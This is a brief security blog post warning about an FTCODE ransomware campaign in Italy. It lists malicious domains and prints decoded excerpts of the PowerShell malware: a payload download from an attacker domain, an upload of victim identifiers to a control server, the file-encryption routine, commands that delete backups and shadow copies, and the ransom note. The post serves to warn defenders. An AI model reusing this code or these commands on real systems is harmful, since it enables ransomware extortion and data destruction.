FTCODE Ransomware

glitchlist Blog Leave a Comment

Caution! In these last days, especially in Italy, a ransomware campaign is activated and conveyed by certified mail.

Stay away from these domains:

connect.simplebutmatters.com 
home.southerntransitions.net 
connect.southerntransitions.com 
home.selltokengarff.com 
home.ktxhome.com 
home.goteamrob.com 
twitter.crtcostruzionisrl.com 
my.mylifeamongthewomen.com 
home.hopedaybook.com 
getpdfreader.13stripesbrewery.com 
getpdfreader.lilupicks.com 
home.artdietfitness.com 
home.parkandhome.com 
home.mmaut.com 
aweb.theshotboard.info 
cofee.theshotboard.net 
home.tith.in 
donald.tilmonday.com 
home.healthiestu.com
home.isdes.com
connect.hairsalonlongmont.com
geer.longmonthairsalon.com
connect.hairsalonlongmont.com

Powershell file analyze:

il malware provvede a scaricare un file powershell leggermente offuscato del quale rendiamo disponibile una copia decodificata ai fini di ricerca.

https://www.cert-pa.it/notizie/campagna-ransomware-ftcode-veicolata-in-italia/
# Powershell file download

$zxbvvjt.DownloadString("http://home.goteamrob.com/?need=6ff4040&vid=dpec1&") | out-file $RndNum;

# GUID extraction

$gxggaiud = $zxbvvjt.UploadString( "http://connect.simplebutmatters.com/", ("ver=$version&vid=dpec1&guid=$guid&psver="+( ( (Get-Host).Version ).Major )+"&" + $data) );

# Encryption function

function encrypt($content, $passwordString){
  $salt="BXCODE hack your system";
  $IVString="BXCODE INIT";
  $Rijndael = new-Object System.Security.Cryptography.RijndaelManaged;   
  $password = [Text.Encoding]::UTF8.GetBytes($passwordString);
  $salt = [Text.Encoding]::UTF8.GetBytes($salt);
  $Rijndael.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $password, $salt, "SHA1", 5).GetBytes(32);
  $Rijndael.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($IVString) )[0..15];
  $Rijndael.Padding="Zeros";
  $Rijndael.Mode="CBC";
  $ecnryptor = $Rijndael.CreateEncryptor();
  $ibifxufvsi = new-Object IO.MemoryStream;
  $yfwfivehah = new-Object Security.Cryptography.CryptoStream $ibifxufvsi,$ecnryptor,"Write";
  $yfwfivehah.Write($content, 0,$content.Length);
  $yfwfivehah.Close();
  $ibifxufvsi.Close();
  $Rijndael.Clear();
  return $ibifxufvsi.ToArray();
}

# Delete all backups

Exec('bcdedit /set tgsbhtzwci bootstatuspolicy ignoreallfailures');
Exec('bcdedit /set tgsbhtzwci recoveryenabled no');
Exec('wbadmin delete catalog -quiet');
Exec('wbadmin delete systemstatebackup');
Exec('wbadmin delete backup');
Exec('vssadmin delete shadows /all /quiet');

# Ransom

message = "<h1>All your files was encrypted!</h1>
<h2  style='color:red'><b>Yes, You can Decrypt Files Encrypted!!!</b> our price 500 USD</h2>
<p>Your personal ID: <b>$guid</b></p>
<p>1. Download Tor browser - <a href='https://www.torproject.org/download/'>https://www.torproject.org/download/</a></p>
<p>2. Install Tor browser</p>
<p>3. Open Tor Browser</p>
<p>4. Open link in TOR browser:  <b>http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=$guid</b></p>
<p>5. Follow the instructions on this page</p>
<h2>***** Warning*****</h2>
<p>Do not rename files</p>
<p>Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)</p>
<p>As evidence, we can for free back one file</p>
<p>Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.</p>
";

Hope this help!

.glitchlist crew

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.